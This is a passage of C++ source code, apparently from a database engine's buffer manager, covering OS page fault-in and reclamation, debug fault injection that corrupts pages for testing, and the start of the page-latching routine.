pbf->sxwl.ReleaseWriteLatch();
break;
default:
Assert( fFalse );
break;
}
}
// For now ...
#ifdef DEBUG
#define EXTRA_LATCHLESS_IO_CHECKS 1
#endif
// Fault in the buffer when in ViewCache mode, where errors may be returned
ERR ErrBFIFaultInBufferIO( __inout BF * const pbf )
{
ERR err = JET_errSuccess;
Assert( pbf->sxwl.FOwnExclusiveLatch() || pbf->sxwl.FOwnWriteLatch() );
TRY
{
const size_t cbChunk = min( (size_t)CbBFIPageSize( pbf ), OSMemoryPageCommitGranularity() );
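// touch the first LONG of each OS-commit-granularity chunk; adding zero atomically is a
// data no-op, but it forces the memory manager to materialize each mapped page, turning any
// in-page IO failure into the exception handled below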
for ( size_t ib = 0; ib < (size_t)CbBFIPageSize( pbf ); ib += cbChunk )
{
AtomicExchangeAdd( &((LONG*)((BYTE*)pbf->pv + ib))[0], 0 );
}
}
EXCEPT( efaExecuteHandler )
{
err = ErrERRCheck( JET_errDiskIO );
}
if ( err < JET_errSuccess )
{
// indicate a hard I/O error
//
OSUHAEmitFailureTag( PinstFromIfmp( pbf->ifmp ), HaDbFailureTagIoHard, L"9bb34106-505c-49b7-a67e-9aedb60756ca" );
}
return err;
}
#ifdef DEBUG
// Corrupts a random piece of data on the page such that ErrCheckPage() will fail.
BOOL FBFICorruptedNodeSizes( const BF * const pbf )
{
CPAGE cpageToCorrupt;
const BFLatch bfl = { pbf->pv, (DWORD_PTR)pbf };
cpageToCorrupt.ReBufferPage( bfl, pbf->ifmp, pbf->pgno, pbf->pv, g_rgcbPageSize[pbf->icbPage] );
// Note: This is a one way trip to he11.
(void)FNegTestSet( fCorruptingPageLogically );
if ( FNDCorruptRandomNodeElement( &cpageToCorrupt ) )
{
OSTrace( JET_tracetagBufferManager, OSFormat( "FaultInjection: injecting corrupted OS MM page on ifmp:pgno %d:%d", (ULONG)pbf->ifmp, pbf->pgno ) );
return fTrue;
}
return fFalse;
}
#endif // DEBUG
// Attempt to fault in (hard and/or soft) the page data.
void BFIFaultInBuffer( __inout void * pv, __in LONG cb )
{
Assert( 0 != cb );
Assert( !BoolParam( JET_paramEnableViewCache ) );
// force the buffer into our working set by touching its pages.
const size_t cbChunk = min( (size_t)cb, OSMemoryPageCommitGranularity() );
size_t ib;
for ( ib = 0; ib < (size_t)cb; ib += cbChunk )
{
(void)AtomicExchangeAdd( &((LONG*)((BYTE*)pv + ib))[0], 0 );
}
}
// Attempt to fault in (hard and/or soft) the page data.
void BFIFaultInBuffer( const PBF pbf )
{
#ifdef EXTRA_LATCHLESS_IO_CHECKS
Assert( pbf->sxwl.FOwnExclusiveLatch() || pbf->sxwl.FOwnWriteLatch() );
Assert( FBFIUpdatablePage( pbf ) );
#else
Assert( pbf->sxwl.FOwner() );
#endif
// This looks protected from the normal ErrBFILatchPage() path where right after we
// evaluate if we were trimmed (leading to here in non-view cache mode), we then evaluate
// paging in for ViewCache mode. Which is good, because otherwise I'd argue bailing out
// right here is incorrect behavior. We would want to page in, though inside an exception
// handler for in-page errors to catch disk IO errors. But just in case, we'll bail here
// as this path has no exception handler.
Assert( !FBFICacheViewCacheDerefIo( pbf ) );
if ( FBFICacheViewCacheDerefIo( pbf ) )
{
// In enable view cache mode we avoid these faults ...
return;
}
// force the buffer into our working set by touching its pages.
BFIFaultInBuffer( pbf->pv, CbBFIBufferSize( pbf ) );
}
// Returns whether the buffer is empty, or partially empty (from an OS MM page perspective).
bool FBFIHasEmptyOSPages( const PBF pbf, LONG * pcmmpgReclaimed )
{
Assert( pbf->sxwl.FOwnWriteLatch() );
Assert( FBFIUpdatablePage( pbf ) );
bool fHasEmptyOSPages = fFalse;
// we look at the start/end of each page. if any page is seen with zero
// data then we will try looking for any non-zero data on the whole page,
// then we will presume that we could not reclaim that page and that the
// buffer may now contain invalid page data
const size_t cbChunk = min( (size_t)CbBFIBufferSize( pbf ), OSMemoryPageCommitGranularity() );
size_t ib;
for ( ib = 0; ib < (size_t)CbBFIBufferSize( pbf ); ib += cbChunk )
{
if ( 0 == ((LONG*)((BYTE*)pbf->pv + ib))[0] &&
0 == ((LONG*)((BYTE*)pbf->pv + ib + cbChunk))[-1] &&
// if we think that we failed to reclaim the data for this buffer
// then we will checksum each VM page of the buffer looking
// for even a single set bit. if the checksum indicates that
// the page is all zeroes then we will presume (now with good
// certainty) that we lost the data in this buffer
FUtilZeroed( (BYTE*)pbf->pv + ib, cbChunk ) )
{
fHasEmptyOSPages = fTrue;
}
else
{
if ( pcmmpgReclaimed )
{
AtomicIncrement( pcmmpgReclaimed );
}
}
}
return fHasEmptyOSPages;
}
// This performs a (potentially destructive) OS soft fault. Unfortunately on failure it zilches
// out some of the buffer, so it is a destructive method. We return true if we managed to soft
// fault the page in without corruption / destruction. On failure the client should assume that
// the page is trashed and will need to be re-read.
bool FBFIDestructiveSoftFaultPage( PBF pbf, __in const BOOL fNewPage )
{
Assert( pbf->sxwl.FOwnWriteLatch() ); // must have right to write page
Assert( FBFICurrentPage( pbf, pbf->ifmp, pbf->pgno ) ); // No point in doing a page in of anything but current; policy, not req
Assert( FBFIUpdatablePage( pbf ) ); // otherwise buffer is undergoing write IO / flush
Assert( (DWORD)CbBFIBufferSize( pbf ) >= OSMemoryPageCommitGranularity() ); // otherwise we could zero out the 2nd BF page on this OS page
// note: if we evicted the BF when we free'd a page at a higher logical level then
// we wouldn't need the || fNewPage here, because the fNewPage case would be clean.
// but since we don't we can get a free'd page that is being reused as a new page as
// an already dirty page in the cache.
Assert( pbf->bfdf < bfdfDirty || fNewPage ); // otherwise we'd lose dirty / un-flushed data
Assert( !BoolParam( JET_paramEnableViewCache ) );
// This is the little bit of OS MM magic that allows us to trick the OS into giving us soft
// faults, without giving us hard faults (instead it gives us a zero'd out page, thus the
// destructive part).
// if we are going to try for a reclaim then reset the page
// before we touch it to avoid causing a hard page fault if
// the page data has been evicted by the OS
OSMemoryPageReset( pbf->pv, CbBFIBufferSize( pbf ) );
// Next try to soft fault in the pages of the buffer, note since we reset the page if we
// can't soft fault in the OS MM will give us a page of zeros.
BFIFaultInBuffer( pbf );
// if we are trying to reclaim the page then we will look at
// the start/end of each page. if any page is seen with zero
// data then we will presume that we could not reclaim that
// page and that the buffer may now contain invalid page data
// Determine if the page has been trashed because the OS memory manager gave us back a page
// that is all zeros.
const BOOL fLosePageToOsPageFile = ( !FNegTest( fStrictIoPerfTesting ) && ErrFaultInjection( 17396 ) < JET_errSuccess );
if ( fLosePageToOsPageFile )
{
const BFLatch bfl = { pbf->pv, (DWORD_PTR)pbf };
CPAGE cpageRuined; // NOTE: MUST be careful what in the page image you use here ...
// Even though we're before our fault injecting zeroing, the page may already be dead b/c
// the OS did lose the page already (and so fault injection is superfluous). BUT the most
// likely case is the page is not ruined yet, and for debugging we'd want the DBTIME, so
// add it to trace event for diagnostics.
cpageRuined.ReBufferPage( bfl, pbf->ifmp, pbf->pgno, pbf->pv, g_rgcbPageSize[pbf->icbPage] );
const DBTIME dbtimeBeforePageOut = FBFIDatabasePage( pbf ) ? cpageRuined.Dbtime() : 0x4242000000004242 /* 0n4774378554966164034 */;
OSTrace( JET_tracetagBufferManager, OSFormat( "FaultInjection: injecting failed OS MM reclaim on ifmp:pgno %d:%d @ %I64d (0x%I64x)", (ULONG)pbf->ifmp, pbf->pgno, dbtimeBeforePageOut, dbtimeBeforePageOut ) );
Assert( (ULONG)CbBFIBufferSize( pbf ) >= OSMemoryPageCommitGranularity() ); // otherwise we're endangering other unlatched BFs
const size_t cbChunk = OSMemoryPageCommitGranularity();
const size_t cMaxChunk = (size_t)CbBFIBufferSize( pbf ) / cbChunk;
const size_t iZeroedChunk = rand() % cMaxChunk;
const BYTE * pb = (BYTE*)pbf->pv + ( iZeroedChunk * cbChunk );
memset( (void*)pb, 0, cbChunk ); // probably do not need to do this, but good to be complete in case it causes corruption
}
BOOL fPageTrashed = FBFIHasEmptyOSPages( pbf, (LONG*)&g_cpgReclaim );
Assert( !fLosePageToOsPageFile || fPageTrashed );
// a non-trashed DB page, with a BF that isn't in error state, should have a valid page
if ( FBFIDatabasePage( pbf ) && !fPageTrashed && pbf->err >= JET_errSuccess )
{
// we should have a valid page, but double check w/ Page Manager
CPAGE cpageCheck;
const BFLatch bfl = { pbf->pv, (DWORD_PTR)pbf };
cpageCheck.ReBufferPage( bfl, pbf->ifmp, pbf->pgno, pbf->pv, g_rgcbPageSize[pbf->icbPage] );
if ( cpageCheck.FPageIsInitialized() )
{
// fault inject ... note this isn't a real usage case, this is presuming a bug
// has caused corruption of our memory at this point.
OnDebug( const BOOL fCorruptOnPageIn = ( ErrFaultInjection( 36380 ) < JET_errSuccess ) &&
FBFICorruptedNodeSizes( pbf ) );
#ifdef DEBUG
if ( fCorruptOnPageIn )
{
OSTrace( JET_tracetagBufferManager, OSFormat( "FaultInjection: injecting corruption on OS MM reclaim on ifmp:pgno %d:%d", (ULONG)pbf->ifmp, pbf->pgno ) );
}
#endif
// validate the page with the Page Manager
const ERR errCheckPage = cpageCheck.ErrCheckPage( CPRINTFDBGOUT::PcprintfInstance(),
OnDebugOrRetail( ( fCorruptOnPageIn ? CPAGE::OnErrorReturnError : CPAGE::OnErrorFireWall ), CPAGE::OnErrorFireWall ),
CPAGE::CheckLineBoundedByTag );
Assert( errCheckPage == JET_errSuccess || fCorruptOnPageIn ); // OnErrorEnforce should prevent this.
// This is technically DEBUG only code b/c we Enforce above for now b/c we need to know if
// this is really happening on page back in ... I'm only doing this b/c it allows me to
// trash a page, and survive and let the stress / test run continue.
fPageTrashed = ( errCheckPage != JET_errSuccess );
AssertSz( errCheckPage == JET_errSuccess || fCorruptOnPageIn, "We hit a corruption on a page in event." );
}
}
if ( fPageTrashed )
{
OSTrace( JET_tracetagBufferManager, OSFormat( "BF failed reclaim (OS soft fault), note page partially zero'd ifmp:pgno %d:%d", (ULONG)pbf->ifmp, pbf->pgno ) );
PERFOpt( AtomicIncrement( (LONG*)&g_cbfNonResidentReclaimedFailed ) );
}
else
{
OSTrace( JET_tracetagBufferManager, OSFormat( "BF succeeded reclaim (OS soft fault) from the OS ifmp:pgno %d:%d", (ULONG)pbf->ifmp, pbf->pgno ) );
PERFOpt( AtomicIncrement( (LONG*)&g_cbfNonResidentReclaimedSuccess ) );
}
return !fPageTrashed;
}
//
// Page Reclamation logic (do not confuse this with claymation, they are unrelated)
//
//
// There are 3 true mechanisms through which a page reclamation could happen:
//
// 1. OS Soft Fault - The best option because no disk access required.
// 2. DB Sync Read - The 2nd best option because DB volume may have more IO capacity, and
// further we read in true page size IO, whereas page faults are usually
// smaller.
// 3. OS Hard Fault - The 3rd best option because we fault in data from OS page file, possibly
// in more than one read IO.
//
// But the problem is we can't just ask for an OS soft fault, we have to use an OS MM trick to do
// an opportunistic soft fault, and this trick is unfortunately destructive to the buffer data on
// a failed soft fault.
// A second problem is we can't just ask for an OS hard fault either, we have to use a write
// A second problem is we can't just ask for a OS hard fault either, we have to use a write
// memory operation (AtomicExchangeAdd( pv, 0 )), and with the extra latchless IO validation
// (page is protected to be RO) this will AV.
//
// So this leads us to 4 paths or options:
//
// A. Attempt Destructive Opportunistic Soft Fault (if we can destroy data)
// B. If page destroyed, Database Sync Read
// C. Fault In (could be Soft or Hard)
// D. Do nothing ... and let later buffer access demand (hard or soft) fault the data.
//
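// As a rough sketch (not a strict contract; the exact behavior below also depends on build
// flags and several early-outs):
//
//      w-latch achieved and page clean enough  -> Option A, falling back to Option B on a failed reclaim
//      x-latch (or better) achieved            -> Option C, an explicit fault-in
//      otherwise / early-out                   -> Option D, leave it to a later demand fault
//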
void BFIReclaimPageFromOS(
__inout PBF pbf,
__in const BFLatchType bfltHave,
__in const BOOL fNewPage,
__in const BOOL fWait,
__in const OSFILEQOS qos,
__in const CPageEvents cpe,
__in const TraceContext& tc
)
{
CSXWLatch::ERR errSXWL = CSXWLatch::ERR::errSuccess;
BFLatchType bfltAchieved = bfltHave;
Assert( !BoolParam( JET_paramEnableViewCache ) );
Assert( bfltHave == bfltShared || bfltHave == bfltExclusive || bfltHave == bfltWrite );
Assert( FBFIOwnsLatchType( pbf, bfltHave ) );
// we will not try to do this if a buffer is smaller than a VM
// page or the page is dirty
// we used to try soft fault if we were dirty and it was a new
// page request ... but we can't do this. The reason why is
// very complex.
const BOOL fAttemptDestructiveSoftFault = ( !FNegTest( fStrictIoPerfTesting ) &&
(DWORD)CbBFIBufferSize( pbf ) >= OSMemoryPageCommitGranularity() &&
( pbf->bfdf < bfdfDirty ) );
//
// First we try to ratchet our latch type as high as possible to use the best reclaim mechanism we can support.
//
if ( fAttemptDestructiveSoftFault )
{
switch( bfltHave )
{
case bfltShared:
// HACK: we cannot wait for the write latch because there
// is code that acquires multiple share latches on the
// same thread. in that case, an attempt to resolve a
// page not resident condition on a subsequent share latch
// will cause a deadlock
errSXWL = pbf->sxwl.ErrTryUpgradeSharedLatchToWriteLatch();
Assert( errSXWL == CSXWLatch::ERR::errSuccess || errSXWL == CSXWLatch::ERR::errLatchConflict );
if ( errSXWL == CSXWLatch::ERR::errSuccess )
{
bfltAchieved = bfltWrite;
#ifdef MINIMAL_FUNCTIONALITY
#else // !MINIMAL_FUNCTIONALITY
// this code is ugly enough without supporting hashed latches
if ( pbf->bfls == bflsHashed )
{
pbf->sxwl.DowngradeWriteLatchToSharedLatch();
bfltAchieved = bfltShared;
}
#endif // MINIMAL_FUNCTIONALITY
}
break;
case bfltExclusive:
Assert( pbf->sxwl.FOwnExclusiveLatch() );
if ( fWait )
{
Assert( pbf->sxwl.FOwnExclusiveLatch() );
errSXWL = pbf->sxwl.ErrUpgradeExclusiveLatchToWriteLatch();
if ( errSXWL == CSXWLatch::ERR::errSuccess ||
errSXWL == CSXWLatch::ERR::errWaitForWriteLatch )
{
if ( errSXWL == CSXWLatch::ERR::errWaitForWriteLatch )
{
PERFOpt( cBFLatchStall.Inc( perfinstGlobal ) );
pbf->sxwl.WaitForWriteLatch();
}
bfltAchieved = bfltWrite;
}
#ifdef MINIMAL_FUNCTIONALITY
#else // !MINIMAL_FUNCTIONALITY
// this code is ugly enough without supporting hashed latches
if ( pbf->bfls == bflsHashed )
{
pbf->sxwl.DowngradeWriteLatchToExclusiveLatch();
bfltAchieved = bfltExclusive;
}
#endif // MINIMAL_FUNCTIONALITY
}
break;
case bfltWrite:
break; // do nothing
default:
AssertSz( fFalse, "Unknown latch type (%d), bad things will probably happen!", bfltHave );
}
}
#ifdef EXTRA_LATCHLESS_IO_CHECKS
// Either we didn't try, or could not improve the latch type; either way maybe we can
// get to the x-latch uncontended ... so we can try Option C (Method #1 or Method #3).
if ( bfltAchieved == bfltShared )
{
errSXWL = pbf->sxwl.ErrUpgradeSharedLatchToExclusiveLatch();
Assert( errSXWL == CSXWLatch::ERR::errSuccess || errSXWL == CSXWLatch::ERR::errLatchConflict );
if ( errSXWL == CSXWLatch::ERR::errSuccess )
{
bfltAchieved = bfltExclusive;
}
}
#endif
Assert( FBFIOwnsLatchType( pbf, bfltAchieved ) );
//
// Try to grab the right to make the page resident.
//
const BFResidenceState bfrsOld = BfrsBFIUpdateResidentState( pbf, bfrsResident );
if ( bfrsResident == bfrsOld )
{
// Though this function is not called unless the page was known to be not resident, timing
// can let this change; we were too slow and someone else got in and made this page resident.
goto HandleError;
}
//
// We need to validate that we can page this in / perform destructive soft faults.
//
#ifdef EXTRA_LATCHLESS_IO_CHECKS
// if the page is undergoing a write in the extra
// check code, then the page has been protected to
// cause AVs if someone updates / references it.
// so we need the x-latch + to verify the BF is not
// undergoing write IO
if ( bfltAchieved >= bfltExclusive &&
#else
if ( bfltAchieved == bfltWrite &&
#endif
!FBFIUpdatablePage( pbf ) )
{
// If we have the write latch, then we will be trying a destructive soft fault, and so
// we must make sure the page is updatable (not undergoing a write IO); bail if it isn't.
goto HandleError;
}
//
// Alright, finally try to reclaim the page through one of the options mentioned above.
//
if ( fAttemptDestructiveSoftFault && bfltAchieved == bfltWrite )
{
//
// Attempt Option A / Method #1, OS Soft Fault
//
if ( !FBFIDestructiveSoftFaultPage( pbf, fNewPage ) && !fNewPage )
{
// Whoopsie! We destroyed the data on some portion of the page ... cover our tracks
// by re-reading in the page from the database (Option B / Method #2).
//
// if we think that we failed to reclaim the data for this
// buffer and we need it (i.e. bflfNew was not specified)
// then we will checksum each VM page of the buffer looking
// for even a single set bit. if the checksum indicates that
// the page is all zeroes then we will presume (now with good
// certainty) that we lost the data in this buffer and we will
// go ahead and reread it from the database
if ( pbf->icbBuffer != pbf->icbPage )
{
// We are about to re-read the page, so we must expand the buffer back to
// full size
CallS( ErrBFISetBufferSize( pbf, (ICBPage)pbf->icbPage, fTrue ) );
}
TraceContextScope tcReclaimFromOS;
tcReclaimFromOS->iorReason.AddFlag( iorfReclaimPageFromOS );
BFISyncRead( pbf, qos, *tcReclaimFromOS );
PERFOpt( AtomicIncrement( (LONG*)&g_cbfNonResidentRedirectedToDatabase ) );
PERFOpt( cBFPagesRepeatedlyRead.Inc( PinstFromIfmp( pbf->ifmp ), pbf->tce ) );
OSTraceFMP(
pbf->ifmp,
JET_tracetagBufferManager,
OSFormat( "Sync-read page=[0x%x:0x%x] (due to OS reclaim fail)", (ULONG)pbf->ifmp, pbf->pgno ) );
(void)ErrBFIValidatePage( pbf, bfltWrite, cpe, *tcReclaimFromOS );
// Note: Error is dealt with in ErrBFILatchPage()
Assert( !fNewPage );
goto HandleError; // skip page back-in validation below.
}
// else we successfully triggered an OS soft fault ... yeah, IO saved!!!
// (or it was a new page operation, so it doesn't matter)
if ( fNewPage )
{
Assert( bfltHave == bfltWrite );
if ( pbf->icbBuffer != pbf->icbPage )
{
// New pages should be full buffer size
CallS( ErrBFISetBufferSize( pbf, (ICBPage)pbf->icbPage, fTrue ) );
}
// We want to zilch out the header so that we can check that any new page has a
// DBTIME set before it goes to disk (i.e. is w-unlatched).
memset( pbf->pv, 0, sizeof(CPAGE::PGHDR2) );
}
}
else
#ifdef EXTRA_LATCHLESS_IO_CHECKS
if ( bfltAchieved >= bfltExclusive )
#endif
{
//
// Option C / Method #1 or #3 - Explicit Fault In (soft or hard)
//
const HRT hrtFaultStart = HrtHRTCount(); // it's a _fault_ start, not a false start ... bah, you'll laugh later
BFIFaultInBuffer( pbf );
const HRT dhrtFault = HrtHRTCount() - hrtFaultStart;
const QWORD cusecFaultTime = CusecHRTFromDhrt( dhrtFault );
Assert( ( ( 1000 * dhrtFault ) / HrtHRTFreq() ) < (HRT)lMax ); // certainly in our test pass, inconceivable!
if ( cusecFaultTime > 100 )
{
// we exclude cusecFaultTime < 100 us because it was probably a soft fault (or maybe SSD?) ...
PERFOpt( AtomicAdd( (QWORD*)&g_cusecNonResidentFaultedInLatencyTotal, cusecFaultTime ) );
PERFOpt( AtomicIncrement( (LONG*)&g_cbfNonResidentReclaimedHardSuccess ) );
BFITrackCacheMissLatency( pbf, hrtFaultStart, bftcmrReasonPagingFaultOs, qos, tc, JET_errSuccess );
}
OSTrace( JET_tracetagBufferManager, OSFormat( "BF forced fault (soft or hard fault) from the OS ifmp:pgno %d:%d in %I64d ms", (ULONG)pbf->ifmp, pbf->pgno, cusecFaultTime / 1000 ) );
}
if ( bfltAchieved >= bfltExclusive && FBFIDatabasePage( pbf ) && pbf->err >= JET_errSuccess && !fNewPage )
{
// we should have a valid page, but double check w/ Page Manager
CPAGE cpageCheck;
const BFLatch bfl = { pbf->pv, (DWORD_PTR)pbf };
cpageCheck.ReBufferPage( bfl, pbf->ifmp, pbf->pgno, pbf->pv, g_rgcbPageSize[pbf->icbPage] );
// interesting case from recovery::redo where we latch an empty page without the new-page flag, so only proceed if the page is actually initialized
if ( cpageCheck.FPageIsInitialized() )
{
#ifdef DEBUG
if ( ErrFaultInjection( 52764 ) < JET_errSuccess )
{
(void)FBFICorruptedNodeSizes( pbf );
}
#endif
(void)cpageCheck.ErrCheckPage( CPRINTFDBGOUT::PcprintfInstance(),
CPAGE::OnErrorFireWall,
CPAGE::CheckLineBoundedByTag );
// void b/c we shouldn't return from the above call on failure.
}
}
HandleError:
// if we upgraded to a write latch to try and reclaim then go
// back down to the proper latch level
Assert( bfltHave <= bfltAchieved );
switch( bfltAchieved )
{
case bfltWrite:
if ( bfltHave == bfltShared )
{
pbf->sxwl.DowngradeWriteLatchToSharedLatch();
}
else if ( bfltHave == bfltExclusive )
{
pbf->sxwl.DowngradeWriteLatchToExclusiveLatch();
}
else
{
Assert( bfltAchieved == bfltHave );
}
break;
case bfltExclusive:
if ( bfltHave == bfltShared )
{
pbf->sxwl.DowngradeExclusiveLatchToSharedLatch();
}
else
{
Assert( bfltAchieved == bfltHave );
}
break;
default:
Assert( bfltAchieved == bfltHave );
}
Assert( FBFIOwnsLatchType( pbf, bfltHave ) );
}
// Given a bflf, determine which events should be logged by the CPAGE validation code
CPageEvents CpeBFICPageEventsFromBflf( const BFLatchFlags bflf )
{
INT flags;
if ( bflf & bflfNoEventLogging )
{
flags = CPageValidationLogEvent::LOG_NONE;
}
else
{
flags = CPageValidationLogEvent::LOG_ALL;
if ( bflf & bflfUninitPageOk )
{
flags = flags & ~CPageValidationLogEvent::LOG_UNINIT_PAGE;
}
if ( bflf & bflfExtensiveChecks )
{
flags = flags | CPageValidationLogEvent::LOG_EXTENSIVE_CHECKS;
}
}
return flags;
}
NOINLINE void BFIAsyncReadWait( __in PBF pbf, __in const BFLatchType bfltWaiting, const BFPriority bfpri, const TraceContext& tc )
{
// No Assert( pbf->sxwl.FWaitingForExclusive ); type member that I know of.
PERFOpt( cBFPrereadStall.Inc( PinstFromIfmp( pbf->ifmp ), pbf->tce ) );
HRT hrtStart = HrtHRTCount();
switch( bfltWaiting )
{
case bfltShared:
pbf->sxwl.WaitForSharedLatch();
break;
case bfltExclusive:
pbf->sxwl.WaitForExclusiveLatch();
break;
default:
AssertSz( fFalse, "Waiting for unexpected latchtype in BFIAsyncReadWait!" );
}
TraceContextScope tcAsyncReadWait( iorpBFLatch );
// Only valid in non-ViewCache mode ... in ViewCache mode the regular ErrIORead() call merely
// accomplishes mapping the page, and the actual IO will happen (and the latency be accumulated) at ErrMMIORead()
// right before BF validates / checksums the page.
if ( !FBFICacheViewCacheDerefIo( pbf ) )
{
BFITrackCacheMissLatency( pbf,
hrtStart,
bftcmrReasonPrereadTooSlow,
QosBFUserAndIoPri( bfpri ),
*tcAsyncReadWait,
pbf->err == errBFIPageNotVerified ? JET_errSuccess : pbf->err );
}
Assert( FBFIOwnsLatchType( pbf, bfltWaiting ) );
}
C_ASSERT( bfltShared == CSXWLatch::iSharedGroup );
C_ASSERT( bfltExclusive == CSXWLatch::iExclusiveGroup );
C_ASSERT( bfltWrite == CSXWLatch::iWriteGroup );
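// these compile-time checks presumably exist so a BFLatchType can be used interchangeably
// with the corresponding CSXWLatch group index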
const BFLatchFlags bflfDefaultValue = bflfDefault;
void BFIInitialize( __in PBF pbf, const TraceContext& tc )
{
Assert( pbf->sxwl.FOwnWriteLatch() );
const IFMP ifmp = pbf->ifmp;
AssertRTL( pbf->err > -65536 && pbf->err < 65536 );
if ( pbf->err == errBFIPageNotVerified )
{
PERFOpt( cBFCacheUnused.Dec( PinstFromIfmp( ifmp ), pbf->tce ) );
}
// move the BF to the appropriate table class
PERFOpt( cBFCache.Dec( PinstFromIfmp( ifmp ), pbf->tce, ifmp ) );
PERFOpt( cBFCache.Inc( PinstFromIfmp( ifmp ), (TCE) tc.nParentObjectClass, ifmp ) );
pbf->tce = (TCE) tc.nParentObjectClass;
// clear the error state of this BF
pbf->err = JET_errSuccess;
// if the page was previously abandoned, as a new page, it is no longer such ...
pbf->fAbandoned = fFalse;
// UNDONE: SOMEONE says that we should always reset the entire page here _if_ the page is clean.
// If the page is dirty we can't reset anything because the page might be versioned by BFWriteLatch,
// in which case we end up writing a zeroed-out page to disk, which breaks recovery.
if ( pbf->icbBuffer != pbf->icbPage &&
pbf->bfdf == bfdfClean )
{
// move the buffer to be an appropriate size for a new page
CallS( ErrBFISetBufferSize( pbf, (ICBPage)pbf->icbPage, fTrue ) );
}
}
ERR ErrBFILatchPage( _Out_ BFLatch* const pbfl,
const IFMP ifmp,
const PGNO pgno,
const BFLatchFlags bflf,
const BFLatchType bfltReq,
const BFPriority bfpri,
const TraceContext& tc,
_Out_ BOOL* const pfCachedNewPage )
{
ERR err = JET_errSuccess;
BFLatchFlags bflfT = bflf;
BFLatchType bfltHave = bfltNone;
BOOL fCacheMiss = fFalse;
IFMPPGNO ifmppgno = IFMPPGNO( ifmp, pgno );
ULONG cRelatches = 0;
PGNOPBF pgnopbf;
BFHash::ERR errHash;
BFHash::CLock lock;
CSXWLatch::ERR errSXWL = CSXWLatch::ERR::errSuccess;
Enforce( pgno != pgnoNull );
Assert( bfltReq != bfltNone );
if ( !FParentObjectClassSet( tc.nParentObjectClass ) )
{
FireWall( "TcLatchObjectClassNotSet" );
}
if ( !FEngineObjidSet( tc.dwEngineObjid ) )
{
FireWall( "TcLatchEngineObjidNotSet" );
}
const CPageEvents cpe = CpeBFICPageEventsFromBflf( bflf );
#ifdef DEBUG
const ULONG cRelatchesLimit = 11;
// a bit heavy on stack (264 bytes on 64-bit), just crossing my fingers ...
struct _BFIRelatchTrackingInfo {
TICK tickStart;
TICK tickHashLock;
TICK tickLatch;
ULONG ulLineContinue;
PBF pbf;
} relatchinfo [cRelatchesLimit];
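// debug-only bookkeeping: one slot per relatch iteration recording when we started, when we
// got the hash lock and the latch, which pbf we saw, and the __LINE__ of the continue that
// sent us around again -- handy for diagnosing a stuck relatch loop from a debugger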
#endif
// Anything larger than 0x7FFFFFFF will be rejected by the flushmap with
// invalid parameter (and asserted on as we've got good defensive code ;).
Expected( pgno <= pgnoSysMax );
// This is double checking / catching if DbScan scans off the EOF of the
// database file (to avoid DbScan running forever - as was the case under
// paramEnableViewCache in Win8.1 and prior). This _can_ theoretically
// fire, if someone sets a larger than 1 GB extension size, because PgnoLast()
// doesn't account for the async pre-extend, which DbScan does check / read.
Expected( ( pgno < g_rgfmp[ifmp].PgnoLast() + 262144 ) /* 1 GB in 4 KB pages */ || ( bflfT & bflfLatchAbandoned ) );
// This assert is important (probably for a few reasons actually, but as of
// the introduction of HyperCache / page dehydration) also because we sort
// of stealth rehydrate the clean pages without fixing up the DB header...
// this is because the full rehydrate does page validation, but if we're
// repurposing an existing buffer as a new page, we can't really expect it
// will pass new page validation before cpage::PreInitializeNewPage_() gets to
// the buffer.
Assert( !( bflf & ( bflfNew | bflfNewIfUncached ) ) || ( bfltReq == bfltWrite ) );
// try forever until we read latch the page or fail with an error
forever
{
Assert( bfltHave == bfltNone );
if ( pfCachedNewPage != NULL )
{
*pfCachedNewPage = fFalse;
}
Assert( cRelatches < cRelatchesLimit );
Assert( cRelatches == 0 || relatchinfo[cRelatches-1].ulLineContinue ); // continue didn't update line?
OnDebug( memset( &(relatchinfo[cRelatches]), 0, sizeof(relatchinfo[cRelatches]) ) );
OnDebug( relatchinfo[cRelatches].tickStart = TickOSTimeCurrent() );
// look up this IFMP / PGNO in the hash table
g_bfhash.ReadLockKey( ifmppgno, &lock );
errHash = g_bfhash.ErrRetrieveEntry( &lock, &pgnopbf );
OnDebug( relatchinfo[cRelatches].tickHashLock = TickOSTimeCurrent() );
OnDebug( relatchinfo[cRelatches].pbf = pgnopbf.pbf );
// we found the IFMP / PGNO
if ( errHash == BFHash::ERR::errSuccess )
{
Assert( pgnopbf.pbf->ifmp == ifmp );
Assert( pgnopbf.pbf->pgno == pgno );
Assert( !pgnopbf.pbf->fAvailable );
Assert( !pgnopbf.pbf->fQuiesced );
// if we are not latching cached pages, bail
if ( bflfT & bflfNoCached )
{
g_bfhash.ReadUnlockKey( &lock );
return ErrERRCheck( errBFPageCached );
}
// this is a cache miss if the found BF is currently undergoing I/O
fCacheMiss = fCacheMiss || pgnopbf.pbf->err == errBFIPageFaultPending;
// latch the page
switch ( bfltReq )
{
case bfltShared:
if ( bflfT & bflfNoWait )
{
errSXWL = pgnopbf.pbf->sxwl.ErrTryAcquireSharedLatch();
}
else
{
errSXWL = pgnopbf.pbf->sxwl.ErrAcquireSharedLatch();
}
break;
case bfltExclusive:
if ( bflfT & bflfNoWait )
{
errSXWL = pgnopbf.pbf->sxwl.ErrTryAcquireExclusiveLatch();
}
else
{
errSXWL = pgnopbf.pbf->sxwl.ErrAcquireExclusiveLatch();
}
break;
case bfltWrite:
if ( bflfT & bflfNoWait )
{
errSXWL = pgnopbf.pbf->sxwl.ErrTryAcquireWriteLatch();
#ifdef MINIMAL_FUNCTIONALITY
#else // !MINIMAL_FUNCTIONALITY
if ( errSXWL == CSXWLatch::ERR::errSuccess && pgnopbf.pbf->bfls == bflsHashed )
{
const size_t cProcs = (size_t)OSSyncGetProcessorCountMax();
size_t iProc = 0;
for ( iProc = 0; iProc < cProcs; iProc++ )
{
CSXWLatch* const psxwlProc = &Ppls( iProc )->rgBFHashedLatch[ pgnopbf.pbf->iHashedLatch ].sxwl;
errSXWL = psxwlProc->ErrTryAcquireWriteLatch();
if ( errSXWL != CSXWLatch::ERR::errSuccess )
{
break;
}
}
if ( errSXWL != CSXWLatch::ERR::errSuccess )
{
for ( size_t iProc2 = 0; iProc2 < iProc; iProc2++ )
{
CSXWLatch* const psxwlProc = &Ppls( iProc2 )->rgBFHashedLatch[ pgnopbf.pbf->iHashedLatch ].sxwl;
psxwlProc->ReleaseWriteLatch();
}
pgnopbf.pbf->sxwl.ReleaseWriteLatch();
}
}
#endif // MINIMAL_FUNCTIONALITY
}
else
{
errSXWL = pgnopbf.pbf->sxwl.ErrAcquireExclusiveLatch();
}
break;
default:
// should be impossible, but if something goes horribly wrong and
// we somehow inexplicably end up here, handle it as a latch conflict
//
Assert( fFalse );
